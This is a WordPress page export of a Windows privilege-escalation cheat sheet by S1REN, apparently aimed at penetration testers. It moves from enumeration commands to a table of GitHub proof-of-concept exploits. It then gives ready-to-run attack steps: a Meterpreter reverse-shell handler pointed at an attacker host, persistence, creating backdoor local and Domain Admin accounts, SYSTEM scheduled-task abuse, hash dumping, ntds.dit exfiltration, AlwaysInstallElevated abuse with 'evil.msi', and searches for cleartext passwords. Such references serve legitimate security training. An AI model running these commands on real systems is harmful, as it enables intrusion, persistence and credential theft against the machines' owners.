{"id":128,"date":"2021-04-24T00:55:21","date_gmt":"2021-04-24T00:55:21","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?page_id=128"},"modified":"2025-08-04T23:45:28","modified_gmt":"2025-08-04T23:45:28","slug":"windows-privilege-escalation-resources","status":"publish","type":"page","link":"https:\/\/sirensecurity.io\/blog\/windows-privilege-escalation-resources\/","title":{"rendered":"Windows Privilege Escalation - Resources"},"content":{"rendered":"\n
\"\"<\/span>
\n

Windows Privilege Escalation<\/p>\n\n\n\n

S1REN<\/p>\n\n\n\n

Going up.<\/p>\n<\/div><\/div>\n\n\n\n

TL;DR<\/strong>
+-------------------------------+
| INITIAL ENUMERATION |
+-------------------------------+<\/p>\n\n\n\n

DOMAIN ENUM (if joined)<\/strong>
BloodHound \/ SharpHound<\/p>\n\n\n\n

WHOAMI?<\/strong>
whoami
echo %username%<\/p>\n\n\n\n

PRIVILEGES?<\/strong>
whoami \/priv<\/p>\n\n\n\n

SYSTEM INFO<\/strong>
systeminfo
wmic os get Caption,CSDVersion,OSArchitecture,Version<\/p>\n\n\n\n

SERVICES<\/strong>
wmic service get name,startname
net start<\/p>\n\n\n\n

ADMIN CHECK<\/strong>
net localgroup administrators
net user<\/p>\n\n\n\n

NETWORK<\/strong>
netstat -anoy
route print
arp -A
ipconfig \/all<\/p>\n\n\n\n

USERS<\/strong>
net users
net user
net localgroup<\/p>\n\n\n\n

FIREWALL<\/strong>
netsh advfirewall firewall show rule name=all<\/p>\n\n\n\n

SCHEDULED TASKS<\/strong>
schtasks \/query \/fo LIST \/v > schtasks.txt<\/p>\n\n\n\n

INSTALLATION RIGHTS
reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \/v AlwaysInstallElevated
reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \/v AlwaysInstallElevated<\/p>\n\n\n\n

+-----------------------------------------------------------------------+\n|     WINDOWS PRIV ESC: GITHUB EXPLOITS                                 |\n+-----------------------------------------------------------------------+\n| Privilege Name              | GitHub PoC                              |\n|---------------------------- |-----------------------------------------|\n| SeDebugPrivilege            | github.com\/bruno-1337\/SeDebugPrivilege- |\n| SeImpersonatePrivilege      | github.com\/itm4n\/PrintSpoofer           |\n| SeAssignPrimaryToken        | github.com\/b4rdia\/HackTricks            |\n| SeTcbPrivilege              | github.com\/hatRiot\/token-priv           |\n| SeCreateTokenPrivilege      | github.com\/hatRiot\/token-priv           |\n| SeLoadDriverPrivilege       | github.com\/k4sth4\/SeLoadDriverPrivilege |\n| SeTakeOwnershipPrivilege    | github.com\/hatRiot\/token-priv           |\n| SeRestorePrivilege          | github.com\/xct\/SeRestoreAbuse           |\n| SeBackupPrivilege           | github.com\/k4sth4\/SeBackupPrivilege     |\n| SeIncreaseQuotaPrivilege    | github.com\/b4rdia\/HackTricks            |\n| SeSystemEnvironment         | github.com\/b4rdia\/HackTricks            |\n| SeMachineAccount            | github.com\/b4rdia\/HackTricks            |\n| SeTrustedCredManAccess      | learn.microsoft.com\/...trusted-caller   |\n| SeRelabelPrivilege          | github.com\/decoder-it\/RelabelAbuse      |\n| SeManageVolumePrivilege     | github.com\/CsEnox\/SeManageVolumeExploit |\n| SeCreateGlobalPrivilege     | github.com\/b4rdia\/HackTricks            |\n+-----------------------------------------------------------------------+\n\nNotes:\n- PrintSpoofer is gold for SeImpersonatePrivilege.\n- SeManageVolume has practical field PoCs.<\/code><\/pre>\n\n\n\n
+----------------------------+\n|     MAINTAINING ACCESS     |\n+----------------------------+\n> METERPRETER REVERSE SHELL SETUP\n  msfconsole\n  use exploit\/multi\/handler\n  set PAYLOAD windows\/meterpreter\/reverse_tcp\n  set LHOST <attacker_ip>\n  set LPORT <port>\n  exploit\n\n> PERSISTENCE\n  meterpreter > run persistence -U -i 5 -p 443 -r <LHOST>\n\n> PORT FORWARDING\n  meterpreter > portfwd add -l 3306 -p 3306 -r <target_ip>\n\n> SYSTEM MIGRATION\n  meterpreter > run post\/windows\/manage\/migrate\n  meterpreter > migrate <PID>\n\n> EXECUTE PAYLOADS\n  powershell.exe \"C:\\Tools\\privesc.ps1\"\n\n+-------------------------------+\n|        PRIVES EC CHECKLIST    |\n+-------------------------------+\n> UNQUOTED SERVICE PATHS\n  wmic service get name,displayname,pathname,startmode | findstr \/i \"auto\" | findstr \/v \"C:\\Windows\" | findstr \/v '\"'\n\n> WEAK SERVICE PERMISSIONS\n  accesschk.exe -uwcqv <service>\n  sc qc <service>\n  icacls \"C:\\Path\\To\\Service.exe\"\n\n> FILE TRANSFER OPTIONS\n  certutil.exe\n  powershell (IEX)\n  SMB \/ FTP \/ TFTP \/ VBScript\n\n> CLEAR TEXT CREDENTIALS\n  findstr \/si password *.txt *.xml *.ini\n  dir \/s *pass* == *cred* == *.config*\n\n> WEAK FILE PERMISSIONS\n  accesschk.exe -uwqs Users c:\\*.*\n  accesschk.exe -uwqs \"Authenticated Users\" c:\\*.*\n\n> NEW ADMIN USER (Local\/Domain)\n  net user siren P@ssw0rd! \/add\n  net localgroup administrators siren \/add\n  net group \"Domain Admins\" siren \/add \/domain\n\n+--------------------------------+\n|     SCHEDULED TASK ABUSE       |\n+--------------------------------+\n> ENUM\n  schtasks \/query \/fo LIST \/v > tasks.txt\n\n> CREATE SYSTEM TASK\n  schtasks \/create \/ru SYSTEM \/sc MINUTE \/mo 5 \/tn RUNME \/tr \"C:\\Tools\\sirenMaint.exe\"\n\n> RUN TASK\n  schtasks \/run \/tn \"RUNME\"\n\n+-------------------------------+\n|    POST EXPLOIT ENUMERATION   |\n+-------------------------------+\n> NETWORK USERS\n  net user\n  net user <target>\n  net localgroup administrators\n\n> NT AUTHORITY CHECKS\n  whoami\n  accesschk.exe \/accepteula\n  MS09-012.exe \"whoami\"\n\n> HASH DUMP\n  meterpreter > hashdump\n\n> EXFILTRATE ntds.dit\n  Use secretsdump.py or disk capture tools\n\n> INSTALLER ABUSE\n  AlwaysInstallElevated = 1\n  msiexec \/i evil.msi\n\n> SHARE ENUMERATION\n  net share\n  net use\n  net use Z: \\\\TARGET\\SHARE \/persistent:yes\n\n+----------------------------+\n|   TOOLKIT \/ RESOURCES      |\n+----------------------------+\n> Windows Exploit Suggester\n  https://github.com\/AonCyberLabs\/Windows-Exploit-Suggester\n\n> Cross Compile Payloads (Linux > Windows)\n  apt-get install mingw-w64\n  x86: i686-w64-mingw32-gcc hello.c -o hello.exe\n  x64: x86_64-w64-mingw32-gcc hello.c -o hello64.exe\n\n> Additional Reading\n  https:\/\/www.fuzzysecurity.com\/tutorials\/16.html\n  https:\/\/book.hacktricks.xyz\/windows\/windows-local-privilege-escalation\n<\/code><\/pre>\n\n\n\n
\n\n<\/code><\/pre>\n\n\n\n
\n<\/code><\/pre>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
TL;DR+-------------------------------+| INITIAL ENUMERATION |+-------------------------------+ DOMAIN ENUM (if joined)BloodHound \/ SharpHound WHOAMI?whoamiecho %username% PRIVILEGES?whoami \/priv SYSTEM INFOsysteminfowmic os get Caption,CSDVersion,OSArchitecture,Version SERVICESwmic service get name,startnamenet start ADMIN CHECKnet localgroup administratorsnet user NETWORKnetstat -anoyroute printarp -Aipconfig \/all USERSnet usersnet usernet localgroup FIREWALLnetsh advfirewall firewall show rule name=all SCHEDULED TASKSschtasks \/query \/fo LIST \/v > schtasks.txt INSTALLATION RIGHTSreg query […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-128","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/128","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=128"}],"version-history":[{"count":31,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/128\/revisions"}],"predecessor-version":[{"id":724,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/128\/revisions\/724"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=128"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}